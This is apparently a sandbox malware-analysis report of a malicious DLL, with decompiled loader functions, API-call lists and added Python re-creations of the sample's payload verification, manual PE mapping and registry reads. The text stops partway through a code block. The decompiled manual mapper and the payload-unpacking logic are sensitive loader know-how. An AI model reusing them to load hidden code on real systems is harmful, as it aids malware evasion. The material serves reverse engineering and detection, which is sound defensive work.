                                                            • Instruction Fuzzy Hash: A7311BB6A00519BFDF21EEA4C880FAEB7B9EB14344F2440AAE505A7341D6309F45CB72
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
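
Added example, not code from the report or from the sample: a Python re-creation of the checks visible in E00DD3612 above, written the way an analyst re-implements such a routine when building a payload extractor. It keeps the decompiled control flow: the buffer must be longer than 0x80 bytes and the first dword of the structure passed in eax must be 0x400; the last 0x80 bytes go to a decoder (E00DD17FA) that yields a 16-byte digest and a payload size; that size may not exceed the bytes before the trailer; a 16-byte field at offset 24 of the decoded structure selects a plain memcpy when it is all zero and otherwise a transform (E00DD3FAB) over the length rounded down to a multiple of 16, whose output must reach the declared size; finally the 16-byte digest of the payload (E00DD2525) is compared dword by dword with the decoded one, and the routine returns the size on success or 0 after freeing its buffer. Everything the report leaves opaque is an assumption here and is labelled in the code: the decoded trailer is treated as a plain little-endian structure (0x400 is 1024 and the trailer is 128 bytes, so the example reads the 0x400 field as a key length, which the report does not state), the digest is taken to be MD5 only because it is 16 bytes long, the transform is stood in for by a repeating-key XOR, and the decompiler's inverted `if(_t51 != 0)` around the memcpy is read as allocation-failure handling. `build_block` packs a constructed payload into that assumed layout so the verifier can be exercised offline.

```python
import hashlib
import struct

TRAILER_LEN = 0x80   # E00DD3612 hands the last 0x80 bytes to E00DD17FA
DIGEST_LEN = 16      # four dwords are compared (_v32.._v20 against _v164.._v152)
KEY_LEN = 16         # the 16-iteration loop tests this many bytes for zero
CTX_MAGIC = 0x400    # first dword of the structure in eax must be 0x400


def decode_trailer(trailer: bytes) -> dict:
    """Stand-in for E00DD17FA, which the report does not resolve.

    Assumed layout of the decoded structure (offsets taken from the stack
    slots E00DD3612 reads): digest[16] at +0, size u32 at +16, param u32 at
    +20, key[16] at +24 (the field tested for all-zero in the loop).
    """
    if len(trailer) != TRAILER_LEN:
        raise ValueError("trailer must be exactly 0x80 bytes")
    digest = trailer[:DIGEST_LEN]
    size, param = struct.unpack_from("<II", trailer, DIGEST_LEN)
    key = trailer[24:24 + KEY_LEN]
    return {"digest": digest, "size": size, "param": param, "key": key}


def transform(data: bytes, key: bytes) -> bytes:
    """Stand-in for E00DD3FAB (assumption). The caller passes length & 0xFFFFFFF0,
    so this is modelled as a 16-byte-block operation: repeating-key XOR over
    the whole blocks, which is its own inverse."""
    whole = len(data) & ~0xF
    return bytes(b ^ key[i % KEY_LEN] for i, b in enumerate(data[:whole]))


def digest16(data: bytes) -> bytes:
    """Stand-in for E00DD2525 (assumption: MD5, chosen only for its 16-byte output)."""
    return hashlib.md5(data).digest()


def verify_block(ctx_magic: int, blob: bytes):
    """Mirror of E00DD3612: (size, payload) on success, (0, None) on failure."""
    # if(__ecx <= 0x80 || *__eax != 0x400) -> fail
    if len(blob) <= TRAILER_LEN or ctx_magic != CTX_MAGIC:
        return 0, None
    body_len = len(blob) - TRAILER_LEN
    info = decode_trailer(blob[body_len:])
    # if(_v148 > __ecx - 0x80) -> fail: declared size must fit before the trailer
    if info["size"] > body_len:
        return 0, None
    body = blob[:body_len]
    if info["key"] == bytes(KEY_LEN):
        # all-zero field: allocate `size` bytes and memcpy them (plain-copy path)
        payload = body[:info["size"]]
    else:
        # otherwise run the transform; its output length must reach `size`
        out = transform(body, info["key"])
        if len(out) < info["size"]:
            return 0, None
        payload = out[:info["size"]]
    # recompute the 16-byte digest over `size` bytes and compare with the decoded one
    if digest16(payload) != info["digest"]:
        return 0, None          # the real routine frees its buffer here
    return info["size"], payload


def build_block(payload: bytes, key: bytes = bytes(KEY_LEN)) -> bytes:
    """Constructed test input: packs `payload` into the assumed container layout
    (body, then the 0x80-byte trailer). Not a format the report documents."""
    size = len(payload)
    if key == bytes(KEY_LEN):
        body = payload
    else:
        body = transform(payload + bytes(-size % 16), key)   # pad to whole blocks
    trailer = digest16(payload) + struct.pack("<II", size, 0) + key
    return body + trailer + bytes(TRAILER_LEN - len(trailer))


if __name__ == "__main__":
    sample = b"constructed payload bytes for the verifier"
    size, data = verify_block(CTX_MAGIC, build_block(sample, bytes(range(1, 17))))
    print(size, data == sample)
```

The two length checks are the ones worth keeping when adapting this to real samples: rejecting a declared size larger than the bytes before the trailer, and rejecting a transform whose output is shorter than that size, are what stop a malformed block from driving the later memcpy and digest computation past the buffer.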

                                                            C-Code - Quality: 86%
                                                            			// Manual PE mapper: __eax points at the raw image being loaded. The header offsets are the
                                                            			// standard PE32 layout: [image+0x3c] = IMAGE_DOS_HEADER.e_lfanew, NT headers+0x50 =
                                                            			// OptionalHeader.SizeOfImage, NT headers+0x28 = OptionalHeader.AddressOfEntryPoint.
                                                            			E6E4B1B55(void* __eax) {
                                                            				char _v8;
                                                            				void* _v12;
                                                            				void* __edi;
                                                            				intOrPtr _t16;
                                                            				void* _t18;
                                                            				long _t24;
                                                            				long _t26;
                                                            				long _t29;
                                                            				signed int _t33;
                                                            				intOrPtr _t40;
                                                            				void* _t41;
                                                            				intOrPtr* _t42;
                                                            				void* _t44;
                                                            
                                                            				_t41 = __eax;
                                                            				_t16 =  *0x6e4b41cc;
                                                            				// SizeOfImage of the raw image, obscured by arithmetic on the global at 0x6e4b41cc
                                                            				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e4b41cc - 0x69b24f45 &  !( *0x6e4b41cc - 0x69b24f45);
                                                            				// Reserve the destination. E6E4B165D resolves its APIs at run time through GetModuleHandleA and
                                                            				// GetProcAddress (see APIs below); _v8 receives the new image base, _v12 a context released at the end.
                                                            				_t18 = E6E4B165D( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e4b41cc - 0x69b24f45 &  !( *0x6e4b41cc - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e4b41cc - 0x69b24f45 &  !( *0x6e4b41cc - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                                                            				if(_t18 != 0) {
                                                            					_t29 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                            					goto L8;
                                                            				} else {
                                                            					_t40 = _v8;
                                                            					// Copy the raw image (_t41) into the new base (_t40): two memcpy calls in the subcall
                                                            					_t29 = E6E4B119E(_t33, _t40, _t41);
                                                            					if(_t29 == 0) {
                                                            						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40; // IMAGE_NT_HEADERS of the mapped copy
                                                            						_t24 = E6E4B1552(_t40, _t44); // executed; LoadLibraryA in the subcall: import resolution
                                                            						_t29 = _t24;
                                                            						if(_t29 == 0) {
                                                            							_t26 = E6E4B1D96(_t44, _t40); // executed; VirtualProtect in the subcall: section page protections
                                                            							_t29 = _t26;
                                                            							if(_t29 == 0) {
                                                            								// Call the mapped image's entry point with the DllMain signature: (base, 1 = DLL_PROCESS_ATTACH, 0)
                                                            								_push(_t26); // _t26 is 0 here
                                                            								_push(1);
                                                            								_push(_t40);
                                                            								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                            									_t29 = GetLastError();
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					// Release the loader context returned by E6E4B165D through its own callbacks, then free it
                                                            					_t42 = _v12;
                                                            					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                            					E6E4B2117(_t42);
                                                            					L8:
                                                            					return _t29;
                                                            				}
                                                            			}
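The decompiled function above is a manual PE mapper: it reads e_lfanew, SizeOfImage and AddressOfEntryPoint at fixed offsets, copies the image to a fresh allocation, fixes up imports and protections, and calls the entry point as DllMain. The following Python is an added example written for this page, not code from the sample or from the sandbox; it parses those same fields from a PE32 image with the bounds checks the malware omits, lays the sections out at their RVAs the way E6E4B119E's memcpy calls do, and builds a small constructed two-section image so the whole thing runs offline. The constructed image, its section names and the field names in the returned dict are this example's own choices.

```python
import struct

# Offsets the decompiled loader reads; these are the standard PE32 layout.
E_LFANEW = 0x3C             # IMAGE_DOS_HEADER.e_lfanew
NT_NUM_SECTIONS = 0x06      # IMAGE_FILE_HEADER.NumberOfSections
NT_OPT_HDR_SIZE = 0x14      # IMAGE_FILE_HEADER.SizeOfOptionalHeader
NT_OPT_MAGIC = 0x18         # IMAGE_OPTIONAL_HEADER32.Magic (0x10B for PE32)
NT_ENTRY_POINT = 0x28       # OptionalHeader.AddressOfEntryPoint (what E6E4B1B55 finally calls)
NT_SIZE_OF_IMAGE = 0x50     # OptionalHeader.SizeOfImage (what E6E4B1B55 reads first)
NT_SIZE_OF_HEADERS = 0x54   # OptionalHeader.SizeOfHeaders
SECTION_HDR_SIZE = 0x28
DLL_PROCESS_ATTACH = 1      # the constant 1 pushed before the entry-point call


def parse_loader_fields(image: bytes) -> dict:
    """Read the header fields a manual mapper needs, validating each step before trusting it."""
    if len(image) < E_LFANEW + 4 or image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (nt,) = struct.unpack_from("<I", image, E_LFANEW)
    if nt + NT_SIZE_OF_HEADERS + 4 > len(image) or image[nt:nt + 4] != b"PE\0\0":
        raise ValueError("e_lfanew does not point at a PE signature")
    (magic,) = struct.unpack_from("<H", image, nt + NT_OPT_MAGIC)
    if magic != 0x10B:
        raise ValueError("not PE32; the 0x28/0x50 offsets only hold for 32-bit images")
    (num_sections,) = struct.unpack_from("<H", image, nt + NT_NUM_SECTIONS)
    (opt_size,) = struct.unpack_from("<H", image, nt + NT_OPT_HDR_SIZE)
    (entry_rva,) = struct.unpack_from("<I", image, nt + NT_ENTRY_POINT)
    (size_of_image,) = struct.unpack_from("<I", image, nt + NT_SIZE_OF_IMAGE)
    (size_of_headers,) = struct.unpack_from("<I", image, nt + NT_SIZE_OF_HEADERS)
    table = nt + 0x18 + opt_size
    if table + num_sections * SECTION_HDR_SIZE > len(image):
        raise ValueError("section table runs past end of file")
    sections = []
    for i in range(num_sections):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from(
            "<8sIIII", image, table + i * SECTION_HDR_SIZE)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "vaddr": vaddr, "rawsize": rawsize, "rawptr": rawptr})
    if entry_rva >= size_of_image:
        raise ValueError("AddressOfEntryPoint lies outside SizeOfImage")
    return {"e_lfanew": nt, "entry_rva": entry_rva, "size_of_image": size_of_image,
            "size_of_headers": size_of_headers, "sections": sections}


def map_image(image: bytes) -> bytearray:
    """Lay the file out as the loader does in memory: headers at offset 0, each section at its RVA."""
    info = parse_loader_fields(image)
    mapped = bytearray(info["size_of_image"])
    hdr = min(info["size_of_headers"], len(image), len(mapped))
    mapped[:hdr] = image[:hdr]
    for s in info["sections"]:
        n = min(s["rawsize"], s["vsize"] or s["rawsize"])
        if s["rawptr"] + n > len(image) or s["vaddr"] + n > len(mapped):
            raise ValueError(f"section {s['name']} does not fit in file or image")
        mapped[s["vaddr"]:s["vaddr"] + n] = image[s["rawptr"]:s["rawptr"] + n]
    return mapped


def build_sample_pe() -> bytes:
    """Constructed two-section PE32 image for testing; it is not the analysed data.dll."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, E_LFANEW, e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x2102)  # i386, 2 sections, DLL
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 0x10, 0x1000)       # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x1C, 0x10000000)   # ImageBase
    struct.pack_into("<I", opt, 0x20, 0x1000)       # SectionAlignment
    struct.pack_into("<I", opt, 0x24, 0x200)        # FileAlignment
    struct.pack_into("<I", opt, 0x38, 0x3000)       # SizeOfImage
    struct.pack_into("<I", opt, 0x3C, 0x200)        # SizeOfHeaders
    text = b"\xB8\x01\x00\x00\x00\xC2\x0C\x00"      # mov eax,1 ; ret 0Ch  (a DllMain that returns TRUE)
    data = b"constructed\0"

    def section(name, vaddr, raw, rawptr, flags):
        return struct.pack("<8sIIIIIIHHI", name, len(raw), vaddr, len(raw), rawptr, 0, 0, 0, 0, flags)

    headers = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)
    headers += section(b".text", 0x1000, text, 0x200, 0x60000020)
    headers += section(b".data", 0x2000, data, 0x400, 0xC0000040)
    return headers.ljust(0x200, b"\0") + text.ljust(0x200, b"\0") + data.ljust(0x200, b"\0")
```

Running `map_image(build_sample_pe())` returns a 0x3000-byte buffer with the DOS/NT headers at 0, the eight-byte stub at RVA 0x1000 and the data at RVA 0x2000; the entry point the loader would call is `base + info["entry_rva"]`. The checks that raise here (bad signature, non-PE32 magic, section table or section data past the end of the buffer, entry point outside SizeOfImage) are exactly the ones a detector or unpacker should apply before treating a dumped region as a mapped image.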

                                                            APIs
                                                              • Part of subcall function 6E4B165D: GetModuleHandleA.KERNEL32(?,00000020), ref: 6E4B1681
                                                              • Part of subcall function 6E4B165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16A3
                                                              • Part of subcall function 6E4B165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16B9
                                                              • Part of subcall function 6E4B165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16CF
                                                              • Part of subcall function 6E4B165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16E5
                                                              • Part of subcall function 6E4B165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16FB
                                                              • Part of subcall function 6E4B119E: memcpy.NTDLL(?,?,?), ref: 6E4B11CB
                                                              • Part of subcall function 6E4B119E: memcpy.NTDLL(?,?,?), ref: 6E4B11FE
                                                              • Part of subcall function 6E4B1552: LoadLibraryA.KERNELBASE ref: 6E4B158A
                                                              • Part of subcall function 6E4B1D96: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6E4B1DCF
                                                              • Part of subcall function 6E4B1D96: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E4B1E44
                                                              • Part of subcall function 6E4B1D96: GetLastError.KERNEL32 ref: 6E4B1E4A
                                                            • GetLastError.KERNEL32 ref: 6E4B1BD3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                            • String ID:
                                                            • API String ID: 2673762927-0
                                                            • Opcode ID: ec30bde89d452ac6b97249d5f96c474bc11a103f47c9dfef906fc7d8ec30ec01
                                                            • Instruction ID: df4ed93986194aaa0972c2e2b7ae39cf0c1c30bbe87b2e60c6f4258911635c42
                                                            • Opcode Fuzzy Hash: ec30bde89d452ac6b97249d5f96c474bc11a103f47c9dfef906fc7d8ec30ec01
                                                            • Instruction Fuzzy Hash: 3911B936604615ABD711AAF5CCC4D9B77BCAF89314704496AEA0297705FBB0ED0A47F0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 045768B2: RegQueryValueExA.KERNELBASE(00000000,04575AB0,00000000,04575AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045768EA
                                                              • Part of subcall function 045768B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 045768FE
                                                              • Part of subcall function 045768B2: RegQueryValueExA.ADVAPI32(00000000,04575AB0,00000000,04575AB0,00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40), ref: 04576918
                                                              • Part of subcall function 045768B2: RegCloseKey.ADVAPI32(00000000,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576942
                                                            • HeapFree.KERNEL32(00000000,04575AB0,00000000,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04567521
                                                              • Part of subcall function 045696CA: memcpy.NTDLL(04575AB0,04575AB0,00000000,04575AB0,04575AB0,04575AB0,?,?,?,045674D8,00000000,00000001,00000000,?,04575AB0,00000000), ref: 045696ED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                                            • String ID:
                                                            • API String ID: 1301464996-0
                                                            • Opcode ID: c5d736d58ba735654b5757c36228e8e4274ef1935dc915a27db2260d08877164
                                                            • Instruction ID: 6975b6e9a637180993c4f59a6b0779269a79fdd56105270866c000bad589b350
                                                            • Opcode Fuzzy Hash: c5d736d58ba735654b5757c36228e8e4274ef1935dc915a27db2260d08877164
                                                            • Instruction Fuzzy Hash: 5F119171600201EBDB25DA59E890EAD7BA9FB5C319F1004A9F603AB241EB74FD04FB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 045768B2: RegQueryValueExA.KERNELBASE(00000000,04575AB0,00000000,04575AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045768EA
                                                              • Part of subcall function 045768B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 045768FE
                                                              • Part of subcall function 045768B2: RegQueryValueExA.ADVAPI32(00000000,04575AB0,00000000,04575AB0,00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40), ref: 04576918
                                                              • Part of subcall function 045768B2: RegCloseKey.ADVAPI32(00000000,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576942
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,1D4E36C0,?,00000000,?,?,?,00000000,045683C0,0456D17E,00000000,00000000), ref: 045839FD
                                                              • Part of subcall function 0456CB3E: StrChrA.SHLWAPI(1D4E36C0,0000002E,00000000,00000000,?,1D4E36C0,0457DBAB,00000000,00000000,00000000), ref: 0456CB50
                                                              • Part of subcall function 0456CB3E: StrChrA.SHLWAPI(00000004,00000020,?,1D4E36C0,0457DBAB,00000000,00000000,00000000), ref: 0456CB5F
                                                              • Part of subcall function 0457AE65: CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,73BCF5B0,0456824E,?,00000001), ref: 0457AE8B
                                                              • Part of subcall function 0457AE65: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0457AE97
                                                              • Part of subcall function 0457AE65: GetModuleHandleA.KERNEL32(?,049B9732,?,00000000,00000000), ref: 0457AEB7
                                                              • Part of subcall function 0457AE65: GetProcAddress.KERNEL32(00000000), ref: 0457AEBE
                                                              • Part of subcall function 0457AE65: Thread32First.KERNEL32(00000001,0000001C), ref: 0457AECE
                                                              • Part of subcall function 0457AE65: CloseHandle.KERNEL32(00000001), ref: 0457AF16
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                                                            • String ID:
                                                            • API String ID: 2627809124-0
                                                            • Opcode ID: 3f525b58f0828e7fd41f1e8db57691227eb74a01db05979c1a91965ecc585e5d
                                                            • Instruction ID: f6f1e28e6402ec8890213314fe1966fd90e900e79e702df19db20d50e94f79d8
                                                            • Opcode Fuzzy Hash: 3f525b58f0828e7fd41f1e8db57691227eb74a01db05979c1a91965ecc585e5d
                                                            • Instruction Fuzzy Hash: 11014F71610149FFAB11EBA9EC98C9FBBACFB456587101159F901B3100EE75BE04EB70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 045768B2: RegQueryValueExA.KERNELBASE(00000000,04575AB0,00000000,04575AB0,00000000,?,00000000,00000000,00000000,00000001,73B74D40,04575AB0,04575AB0,?,045674AD,?), ref: 045768EA
                                                              • Part of subcall function 045768B2: RtlAllocateHeap.NTDLL(00000000,?), ref: 045768FE
                                                              • Part of subcall function 045768B2: RegQueryValueExA.ADVAPI32(00000000,04575AB0,00000000,04575AB0,00000000,?,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40), ref: 04576918
                                                              • Part of subcall function 045768B2: RegCloseKey.ADVAPI32(00000000,?,045674AD,?,04575AB0,00000000,00000001,00000000,73B74D40,?,?,?,04575AB0,00000000), ref: 04576942
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,045683BB,0456D17E,00000000,00000000), ref: 0457DBC5
                                                              • Part of subcall function 0456CB3E: StrChrA.SHLWAPI(1D4E36C0,0000002E,00000000,00000000,?,1D4E36C0,0457DBAB,00000000,00000000,00000000), ref: 0456CB50
                                                              • Part of subcall function 0456CB3E: StrChrA.SHLWAPI(00000004,00000020,?,1D4E36C0,0457DBAB,00000000,00000000,00000000), ref: 0456CB5F
                                                              • Part of subcall function 0456A6F7: lstrlen.KERNEL32(045647C4,00000000,00000000,?,?,?,045647C4,00000035,00000000,-00000005,00000000), ref: 0456A727
                                                              • Part of subcall function 0456A6F7: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0456A73D
                                                              • Part of subcall function 0456A6F7: memcpy.NTDLL(00000010,045647C4,00000000,?,?,045647C4,00000035,00000000), ref: 0456A773
                                                              • Part of subcall function 0456A6F7: memcpy.NTDLL(00000010,00000000,00000035,?,?,045647C4,00000035), ref: 0456A78E
                                                              • Part of subcall function 0456A6F7: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 0456A7AC
                                                              • Part of subcall function 0456A6F7: GetLastError.KERNEL32(?,?,045647C4,00000035), ref: 0456A7B6
                                                              • Part of subcall function 0456A6F7: HeapFree.KERNEL32(00000000,00000000,?,?,045647C4,00000035), ref: 0456A7D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                                                            • String ID:
                                                            • API String ID: 730886825-0
                                                            • Opcode ID: 15242a626e9c4a01bd97d6665404656c4d19c2338f06b27fc87d0d583f8f765e
                                                            • Instruction ID: 10e4389715d0c8166be5bdfa53e32ff27b529b6a24c6e607f82b89944e234f5b
                                                            • Opcode Fuzzy Hash: 15242a626e9c4a01bd97d6665404656c4d19c2338f06b27fc87d0d583f8f765e
                                                            • Instruction Fuzzy Hash: 62014C31510205FBEB11DB95EC45F9E7BBCFB45614F100059B605A7180EA74BE08EB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			// Fetches a wide-string value under the predefined key 0x80000002 (HKEY_LOCAL_MACHINE) and
                                                            			// hands it back through __edi NUL-terminated; an empty value is freed and reported as error 2.
                                                            			E00DD6A1E(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                                                            				void* _t24;
                                                            				signed short _t25;
                                                            				signed int _t27;
                                                            				intOrPtr* _t28;
                                                            				signed short _t29;
                                                            
                                                            				_t28 = __edi;
                                                            				if(_a4 == 0) {
                                                            					L2:
                                                            					// _a4 receives the heap buffer holding the value, _a12 its size in bytes
                                                            					_t29 = E00DD15D7(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                                            					if(_t29 == 0) {
                                                            						_t27 = _a12 >> 1; // byte count -> WCHAR count
                                                            						if(_t27 == 0) {
                                                            							_t29 = 2; // ERROR_FILE_NOT_FOUND
                                                            							HeapFree( *0xdda290, 0, _a4);
                                                            						} else {
                                                            							_t24 = _a4;
                                                            							// _t29 is 0 here, so the AND forces a NUL into the last WCHAR: a value stored without
                                                            							// a terminator loses its final character instead of being read past its end
                                                            							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
                                                            							 *_t28 = _t24;
                                                            						}
                                                            					}
                                                            					L6:
                                                            					return _t29;
                                                            				}
                                                            				// With a non-null _a4 the registry read is only the fallback: it runs when E00DD5D1D fails
                                                            				_t25 = E00DD5D1D(_a4, _a8, _a12, __edi); // executed
                                                            				_t29 = _t25;
                                                            				if(_t29 == 0) {
                                                            					goto L6;
                                                            				}
                                                            				goto L2;
                                                            			}
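The post-processing in E00DD6A1E (halve the byte count, reject an empty value with error 2, force a NUL into the last WCHAR) is easy to misread in the decompiled form. The Python below is an added example for this page, not code from the sample; it reproduces that logic on a raw REG_SZ buffer, handles the edge cases the loader's arithmetic implies (an odd trailing byte, a value stored without a terminator), and ships a constructed helper that produces the bytes RegQueryValueExW would return so it runs without a registry. The function and helper names are this example's own.

```python
from typing import Optional, Tuple

ERROR_SUCCESS = 0
ERROR_FILE_NOT_FOUND = 2  # the 2 the loader returns for an empty value


def finish_wide_reg_value(raw: Optional[bytes]) -> Tuple[int, Optional[str]]:
    """Post-process a raw REG_SZ buffer the way E00DD6A1E does.

    `raw` stands in for the bytes RegQueryValueEx wrote. The byte count is halved to a
    WCHAR count (an odd trailing byte is dropped), an empty value is reported as error 2
    and the buffer is discarded, and the last WCHAR is overwritten with NUL so the result
    is always terminated, at the cost of the final character when the stored value had
    no terminator of its own.
    """
    if raw is None:
        return ERROR_FILE_NOT_FOUND, None
    cch = len(raw) >> 1
    if cch == 0:
        return ERROR_FILE_NOT_FOUND, None
    buf = bytearray(raw[:cch * 2])
    buf[cch * 2 - 2:cch * 2] = b"\x00\x00"      # the `& 0` on the last WCHAR
    text = buf.decode("utf-16-le", errors="replace").split("\x00", 1)[0]
    return ERROR_SUCCESS, text


def wide_reg_bytes(value: str, terminated: bool = True) -> bytes:
    """Constructed stand-in for a REG_SZ value as returned by RegQueryValueExW."""
    return (value + ("\x00" if terminated else "")).encode("utf-16-le")
```

A properly terminated value round-trips unchanged; `wide_reg_bytes("abc", terminated=False)` comes back as `"ab"`, which is the behaviour to expect when reproducing the sample's configuration reads against a registry value written by another tool without a trailing NUL.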

                                                            APIs
                                                              • Part of subcall function 00DD5D1D: SysFreeString.OLEAUT32(00000000), ref: 00DD5D83
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,73BCF710,?,00000000,?,00000000,?,00DD1501,?,004F0053,039C9318,00000000,?), ref: 00DD6A7F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Free$HeapString
                                                            • String ID:
                                                            • API String ID: 3806048269-0
                                                            • Opcode ID: fc34a216f59afe03d4cf41874d29a96d5720129771760fc1e469ec61b865eb8b
                                                            • Instruction ID: 4888dc45ae4cba6e2961167ea8a6665a6874567cca45784bcbb3d9b61f5e0666
                                                            • Opcode Fuzzy Hash: fc34a216f59afe03d4cf41874d29a96d5720129771760fc1e469ec61b865eb8b
                                                            • Instruction Fuzzy Hash: 1F01F636101659BBCB229F44DC05FEA7B65FB04790F08C02AFE45AA224D731D960DBE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 75%
                                                            			// CryptoAPI key setup. In the subcall E00DD3FAB (see APIs below): CryptAcquireContextW with
                                                            			// provider type 0x18 = PROV_RSA_AES and flags 0xF0000000 = CRYPT_VERIFYCONTEXT, CryptImportKey
                                                            			// with a 0x1C-byte blob (12-byte PLAINTEXTKEYBLOB header + 16-byte key), and
                                                            			// CryptSetKeyParam with parameter 1 = KP_IV.
                                                            			E00DD488A(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                                            				void** _t11;
                                                            				void* _t13;
                                                            				void* _t21;
                                                            
                                                            				_t11 =  &_a4;
                                                            				_t21 = 0;
                                                            				__imp__( &_a8); // lstrlen, per the APIs below
                                                            				_t13 = E00DD3FAB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                                                            				if(_t13 == 0) {
                                                            					_t21 = E00DD77D7(_a8 + _a8); // RtlAllocateHeap in the subcall
                                                            					if(_t21 != 0) {
                                                            						E00DD4324(_a4, _t21, _t23); // _t23 is not recovered by the decompiler
                                                            					}
                                                            					E00DD77EC(_a4);
                                                            				}
                                                            				return _t21;
                                                            			}
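The only hard facts the report gives about the key are in the E00DD3FAB subcall: a PROV_RSA_AES context, a 0x1C-byte blob passed to CryptImportKey, and KP_IV set afterwards. The Python below is an added example for this page, not code from the sample; it serialises and parses the PLAINTEXTKEYBLOB layout CryptImportKey expects, which is how an analyst recovers the key length (0x1C minus the 12-byte header leaves 16 bytes) from a hooked call. The ALG_ID is an assumption: the page shows the blob size, not the algorithm, so CALG_AES_128 is used as the plausible 16-byte-key choice for that provider and can be swapped for whatever the real header carries.

```python
import struct

# CryptoAPI constants (wincrypt.h) matching the arguments seen in the E00DD3FAB subcall.
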